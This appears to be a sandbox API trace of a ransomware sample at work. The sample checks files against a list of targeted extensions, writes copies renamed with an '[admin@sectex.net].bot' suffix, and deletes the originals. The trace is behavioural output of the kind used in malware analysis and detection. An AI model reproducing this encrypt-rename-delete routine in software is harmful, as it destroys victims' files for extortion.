	[0038.278] lstrlenW (lpString=".zip") returned 4
	[0038.279] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.279] lstrlenW (lpString=".rar") returned 4
	[0038.279] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString=".bz2") returned 4
	[0038.279] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString=".7z") returned 3
	[0038.279] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.279] lstrlenW (lpString=".dbf") returned 4
	[0038.279] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.279] lstrlenW (lpString=".1cd") returned 4
	[0038.279] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.279] lstrlenW (lpString=".jpg") returned 4
	[0038.279] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.279] lstrlenW (lpString=".doc") returned 4
	[0038.279] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString=".docx") returned 5
	[0038.279] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.279] lstrlenW (lpString=".pdf") returned 4
	[0038.279] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString=".xls") returned 4
	[0038.279] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString=".xlsx") returned 5
	[0038.279] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.279] lstrlenW (lpString=".ppt") returned 4
	[0038.279] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.279] lstrlenW (lpString=".zip") returned 4
	[0038.279] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.279] lstrlenW (lpString=".rar") returned 4
	[0038.280] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.280] lstrlenW (lpString=".bz2") returned 4
	[0038.280] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.280] lstrlenW (lpString=".7z") returned 3
	[0038.280] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.280] lstrlenW (lpString=".dbf") returned 4
	[0038.280] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.280] lstrlenW (lpString=".1cd") returned 4
	[0038.280] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.280] lstrlenW (lpString=".jpg") returned 4
	[0038.280] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.280] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.280] lstrlenW (lpString="PowerPointMUI.XML") returned 17
	[0038.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.280] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1450) returned 1
	[0038.280] CloseHandle (hObject=0x1b0) returned 1
	[0038.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 0x20
	[0038.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.281] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.281] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.695] GetLastError () returned 0x0
	[0039.695] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5aa, lpOverlapped=0x0) returned 1
	[0039.698] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0039.699] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.699] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0039.699] SetEndOfFile (hFile=0x1c0) returned 1
	[0039.700] CloseHandle (hObject=0x1c0) returned 1
	[0039.700] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.700] SetEndOfFile (hFile=0x1b0) returned 1
	[0039.701] CloseHandle (hObject=0x1b0) returned 1
	[0039.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.701] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 1
	[0039.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.702] lstrlenW (lpString=".doc") returned 4
	[0039.702] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString=".docx") returned 5
	[0039.702] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0039.702] lstrlenW (lpString=".pdf") returned 4
	[0039.702] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString=".xls") returned 4
	[0039.702] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString=".xlsx") returned 5
	[0039.702] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0039.702] lstrlenW (lpString=".ppt") returned 4
	[0039.702] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.702] lstrlenW (lpString=".zip") returned 4
	[0039.702] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.702] lstrlenW (lpString=".rar") returned 4
	[0039.702] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString=".bz2") returned 4
	[0039.702] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString=".7z") returned 3
	[0039.702] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.702] lstrlenW (lpString=".dbf") returned 4
	[0039.702] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.702] lstrlenW (lpString=".1cd") returned 4
	[0039.702] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.702] lstrlenW (lpString=".jpg") returned 4
	[0039.702] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.703] lstrlenW (lpString=".doc") returned 4
	[0039.703] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString=".docx") returned 5
	[0039.703] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0039.703] lstrlenW (lpString=".pdf") returned 4
	[0039.703] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString=".xls") returned 4
	[0039.703] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString=".xlsx") returned 5
	[0039.703] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0039.703] lstrlenW (lpString=".ppt") returned 4
	[0039.703] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.703] lstrlenW (lpString=".zip") returned 4
	[0039.703] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.703] lstrlenW (lpString=".rar") returned 4
	[0039.703] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString=".bz2") returned 4
	[0039.703] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString=".7z") returned 3
	[0039.703] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.703] lstrlenW (lpString=".dbf") returned 4
	[0039.703] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.703] lstrlenW (lpString=".1cd") returned 4
	[0039.703] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114
	[0039.703] lstrlenW (lpString=".jpg") returned 4
	[0039.703] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.704] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.704] lstrlenW (lpString="SETUP.XML") returned 9
	[0039.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.320] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1608) returned 1
	[0040.320] CloseHandle (hObject=0x1a0) returned 1
	[0040.320] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 0x20
	[0040.320] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.320] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.320] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0040.320] GetLastError () returned 0x0
	[0040.320] ReadFile (in: hFile=0x1a0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x648, lpOverlapped=0x0) returned 1
	[0040.330] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x650, lpOverlapped=0x0) returned 1
	[0040.331] ReadFile (in: hFile=0x1a0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.331] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0040.331] SetEndOfFile (hFile=0x1c0) returned 1
	[0040.331] CloseHandle (hObject=0x1c0) returned 1
	[0040.332] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.332] SetEndOfFile (hFile=0x1a0) returned 1
	[0040.333] CloseHandle (hObject=0x1a0) returned 1
	[0040.333] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.333] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 1
	[0040.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.334] lstrlenW (lpString=".doc") returned 4
	[0040.334] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString=".docx") returned 5
	[0040.334] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0040.334] lstrlenW (lpString=".pdf") returned 4
	[0040.334] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString=".xls") returned 4
	[0040.334] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString=".xlsx") returned 5
	[0040.334] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0040.334] lstrlenW (lpString=".ppt") returned 4
	[0040.334] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.334] lstrlenW (lpString=".zip") returned 4
	[0040.334] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.334] lstrlenW (lpString=".rar") returned 4
	[0040.334] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString=".bz2") returned 4
	[0040.334] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString=".7z") returned 3
	[0040.334] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.334] lstrlenW (lpString=".dbf") returned 4
	[0040.334] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.334] lstrlenW (lpString=".1cd") returned 4
	[0040.334] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.334] lstrlenW (lpString=".jpg") returned 4
	[0040.334] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.335] lstrlenW (lpString=".doc") returned 4
	[0040.335] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString=".docx") returned 5
	[0040.335] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0040.335] lstrlenW (lpString=".pdf") returned 4
	[0040.335] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString=".xls") returned 4
	[0040.335] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString=".xlsx") returned 5
	[0040.335] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0040.335] lstrlenW (lpString=".ppt") returned 4
	[0040.335] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.335] lstrlenW (lpString=".zip") returned 4
	[0040.335] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.335] lstrlenW (lpString=".rar") returned 4
	[0040.335] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString=".bz2") returned 4
	[0040.335] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString=".7z") returned 3
	[0040.335] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.335] lstrlenW (lpString=".dbf") returned 4
	[0040.335] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.335] lstrlenW (lpString=".1cd") returned 4
	[0040.335] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105
	[0040.335] lstrlenW (lpString=".jpg") returned 4
	[0040.335] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.336] lstrcmpiW (lpString1=".TXT", lpString2=".bot") returned 1
	[0040.336] lstrlenW (lpString="METCONV.TXT") returned 11
	[0040.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.336] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1183416) returned 1
	[0040.337] CloseHandle (hObject=0x1a0) returned 1
	[0040.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 0x20
	[0040.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.337] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.337] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0040.337] GetLastError () returned 0x0
	[0040.337] ReadFile (in: hFile=0x1a0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0040.361] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0040.381] ReadFile (in: hFile=0x1a0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x20ec8, lpOverlapped=0x0) returned 1
	[0040.393] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x20ed0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x20ed0, lpOverlapped=0x0) returned 1
	[0040.399] ReadFile (in: hFile=0x1a0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
